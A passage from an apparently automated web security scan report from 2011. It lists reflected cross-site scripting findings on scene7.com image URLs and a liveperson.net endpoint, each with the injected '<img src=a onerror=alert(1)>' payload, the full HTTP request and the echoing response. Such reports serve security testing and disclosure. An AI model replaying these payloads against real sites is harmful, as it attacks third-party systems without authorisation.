Unable to find /bluestembrands/NH642_VA_999f4083<img src=a onerror=alert(1)>f0bf3cf58c5

5.85. http://s7d5.scene7.com/is/image/bluestembrands/NI736_WVA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NI736_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d75c6<img%20src%3da%20onerror%3dalert(1)>7c7ffbc116d was submitted in the REST URL parameter 4. This input was echoed as d75c6<img src=a onerror=alert(1)>7c7ffbc116d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NI736_WVA_999d75c6<img%20src%3da%20onerror%3dalert(1)>7c7ffbc116d?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:27 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NI736_WVA_999d75c6<img src=a onerror=alert(1)>7c7ffbc116d

5.86. http://s7d5.scene7.com/is/image/bluestembrands/NJ310_WM1_400 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NJ310_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 85774<img%20src%3da%20onerror%3dalert(1)>9ee1255cff was submitted in the REST URL parameter 4. This input was echoed as 85774<img src=a onerror=alert(1)>9ee1255cff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NJ310_WM1_40085774<img%20src%3da%20onerror%3dalert(1)>9ee1255cff?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:36:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:37 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NJ310_WM1_40085774<img src=a onerror=alert(1)>9ee1255cff

5.87. http://s7d5.scene7.com/is/image/bluestembrands/NJ484_WVA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NJ484_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 60ea5<img%20src%3da%20onerror%3dalert(1)>aa190ebc46 was submitted in the REST URL parameter 4. This input was echoed as 60ea5<img src=a onerror=alert(1)>aa190ebc46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NJ484_WVA_99960ea5<img%20src%3da%20onerror%3dalert(1)>aa190ebc46?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:37:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:17 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NJ484_WVA_99960ea5<img src=a onerror=alert(1)>aa190ebc46

5.88. http://s7d5.scene7.com/is/image/bluestembrands/NJ847_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NJ847_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4ccb1<img%20src%3da%20onerror%3dalert(1)>30e1f908c3d was submitted in the REST URL parameter 4. This input was echoed as 4ccb1<img src=a onerror=alert(1)>30e1f908c3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NJ847_VA_9994ccb1<img%20src%3da%20onerror%3dalert(1)>30e1f908c3d?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:38:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:20 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NJ847_VA_9994ccb1<img src=a onerror=alert(1)>30e1f908c3d

5.89. http://s7d5.scene7.com/is/image/bluestembrands/NK248_VC_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NK248_VC_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f29e6<img%20src%3da%20onerror%3dalert(1)>b9664e76175 was submitted in the REST URL parameter 4. This input was echoed as f29e6<img src=a onerror=alert(1)>b9664e76175 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NK248_VC_999f29e6<img%20src%3da%20onerror%3dalert(1)>b9664e76175?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:38:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:08 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NK248_VC_999f29e6<img src=a onerror=alert(1)>b9664e76175

5.90. http://s7d5.scene7.com/is/image/bluestembrands/NL522_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NL522_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ee9d8<img%20src%3da%20onerror%3dalert(1)>2d4c68c6ee6 was submitted in the REST URL parameter 4. This input was echoed as ee9d8<img src=a onerror=alert(1)>2d4c68c6ee6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NL522_A_999ee9d8<img%20src%3da%20onerror%3dalert(1)>2d4c68c6ee6?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Expires: Mon, 16 May 2011 01:38:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:13 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NL522_A_999ee9d8<img src=a onerror=alert(1)>2d4c68c6ee6

5.91. http://s7d5.scene7.com/is/image/bluestembrands/NL578_WVA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NL578_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b08db<img%20src%3da%20onerror%3dalert(1)>baab8c8b42e was submitted in the REST URL parameter 4. This input was echoed as b08db<img src=a onerror=alert(1)>baab8c8b42e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NL578_WVA_999b08db<img%20src%3da%20onerror%3dalert(1)>baab8c8b42e?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:28 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NL578_WVA_999b08db<img src=a onerror=alert(1)>baab8c8b42e

5.92. http://s7d5.scene7.com/is/image/bluestembrands/NM486_VC_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NM486_VC_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 39b37<img%20src%3da%20onerror%3dalert(1)>cca42c92227 was submitted in the REST URL parameter 4. This input was echoed as 39b37<img src=a onerror=alert(1)>cca42c92227 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NM486_VC_99939b37<img%20src%3da%20onerror%3dalert(1)>cca42c92227?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:37:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:28 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NM486_VC_99939b37<img src=a onerror=alert(1)>cca42c92227

5.93. http://s7d5.scene7.com/is/image/bluestembrands/NQ086_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NQ086_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9f357<img%20src%3da%20onerror%3dalert(1)>6e2d4b0cae9 was submitted in the REST URL parameter 4. This input was echoed as 9f357<img src=a onerror=alert(1)>6e2d4b0cae9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NQ086_VA_9999f357<img%20src%3da%20onerror%3dalert(1)>6e2d4b0cae9?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:38:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:12 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NQ086_VA_9999f357<img src=a onerror=alert(1)>6e2d4b0cae9

5.94. http://s7d5.scene7.com/is/image/bluestembrands/NQ087_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NQ087_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 34855<img%20src%3da%20onerror%3dalert(1)>8daf28cab41 was submitted in the REST URL parameter 4. This input was echoed as 34855<img src=a onerror=alert(1)>8daf28cab41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NQ087_VA_99934855<img%20src%3da%20onerror%3dalert(1)>8daf28cab41?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:38:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:42 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NQ087_VA_99934855<img src=a onerror=alert(1)>8daf28cab41

5.95. http://s7d5.scene7.com/is/image/bluestembrands/NQ582_WVA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NQ582_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f217f<img%20src%3da%20onerror%3dalert(1)>6b640d4054c was submitted in the REST URL parameter 4. This input was echoed as f217f<img src=a onerror=alert(1)>6b640d4054c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NQ582_WVA_999f217f<img%20src%3da%20onerror%3dalert(1)>6b640d4054c?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:27 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NQ582_WVA_999f217f<img src=a onerror=alert(1)>6b640d4054c

5.96. http://s7d5.scene7.com/is/image/bluestembrands/NR042_WVA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NR042_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3d2ca<img%20src%3da%20onerror%3dalert(1)>8ae80290fc0 was submitted in the REST URL parameter 4. This input was echoed as 3d2ca<img src=a onerror=alert(1)>8ae80290fc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NR042_WVA_9993d2ca<img%20src%3da%20onerror%3dalert(1)>8ae80290fc0?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:25 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NR042_WVA_9993d2ca<img src=a onerror=alert(1)>8ae80290fc0

5.97. http://s7d5.scene7.com/is/image/bluestembrands/NR149_WVA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NR149_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c31b5<img%20src%3da%20onerror%3dalert(1)>f3ed8f7c5aa was submitted in the REST URL parameter 4. This input was echoed as c31b5<img src=a onerror=alert(1)>f3ed8f7c5aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NR149_WVA_999c31b5<img%20src%3da%20onerror%3dalert(1)>f3ed8f7c5aa?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:50 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NR149_WVA_999c31b5<img src=a onerror=alert(1)>f3ed8f7c5aa

5.98. http://s7d5.scene7.com/is/image/bluestembrands/NS372_WVA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NS372_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f5884<img%20src%3da%20onerror%3dalert(1)>816bdda8ac0 was submitted in the REST URL parameter 4. This input was echoed as f5884<img src=a onerror=alert(1)>816bdda8ac0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NS372_WVA_999f5884<img%20src%3da%20onerror%3dalert(1)>816bdda8ac0?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:29 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NS372_WVA_999f5884<img src=a onerror=alert(1)>816bdda8ac0

5.99. http://s7d5.scene7.com/is/image/bluestembrands/h6381_400 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/h6381_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8eb52<img%20src%3da%20onerror%3dalert(1)>e396f72724a was submitted in the REST URL parameter 4. This input was echoed as 8eb52<img src=a onerror=alert(1)>e396f72724a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/h6381_4008eb52<img%20src%3da%20onerror%3dalert(1)>e396f72724a?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 84
Expires: Mon, 16 May 2011 01:37:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:00 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/h6381_4008eb52<img src=a onerror=alert(1)>e396f72724a

5.100. http://s7d5.scene7.com/is/image/bluestembrands/j7804_400 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/j7804_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c5b08<img%20src%3da%20onerror%3dalert(1)>267c3cd35af was submitted in the REST URL parameter 4. This input was echoed as c5b08<img src=a onerror=alert(1)>267c3cd35af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/j7804_400c5b08<img%20src%3da%20onerror%3dalert(1)>267c3cd35af?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 84
Expires: Mon, 16 May 2011 01:36:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:59 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/j7804_400c5b08<img src=a onerror=alert(1)>267c3cd35af

5.101. http://s7d5.scene7.com/is/image/bluestembrands/n4728_400 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/n4728_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c9dce<img%20src%3da%20onerror%3dalert(1)>898fe953f5b was submitted in the REST URL parameter 4. This input was echoed as c9dce<img src=a onerror=alert(1)>898fe953f5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/n4728_400c9dce<img%20src%3da%20onerror%3dalert(1)>898fe953f5b?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 84
Expires: Mon, 16 May 2011 01:36:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:58 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/n4728_400c9dce<img src=a onerror=alert(1)>898fe953f5b

5.102. http://sales.liveperson.net/hc/71737897/ [msessionkey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71737897/

Issue detail

The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload cebc0<img%20src%3da%20onerror%3dalert(1)>11076a3a308 was submitted in the msessionkey parameter. This input was echoed as cebc0<img src=a onerror=alert(1)>11076a3a308 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hc/71737897/?&visitor=16601155425835&msessionkey=1547318312735205030cebc0<img%20src%3da%20onerror%3dalert(1)>11076a3a308&siteContainer=STANDALONE&site=71737897&cmd=mTagKnockPage&lpCallId=152897602799-290051536113&protV=20&lpjson=1&id=9784109386&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sonystyle-sales-computer-english%7ClpMTagConfig.db1%7ClpButton-DIV%7C%23chat-sonystyle-service-english%7ClpMTagConfig.db1%7ClpButton-DIV-service%7C%23chat-sonystyle-sales-cart-english%7ClpMTagConfig.db1%7ClpButton-DIV-checkout%7C HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=8198552921644780502
Cookie: HumanClickKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; LivePersonID=LP i=16601155425835,d=1302186497

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:21:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
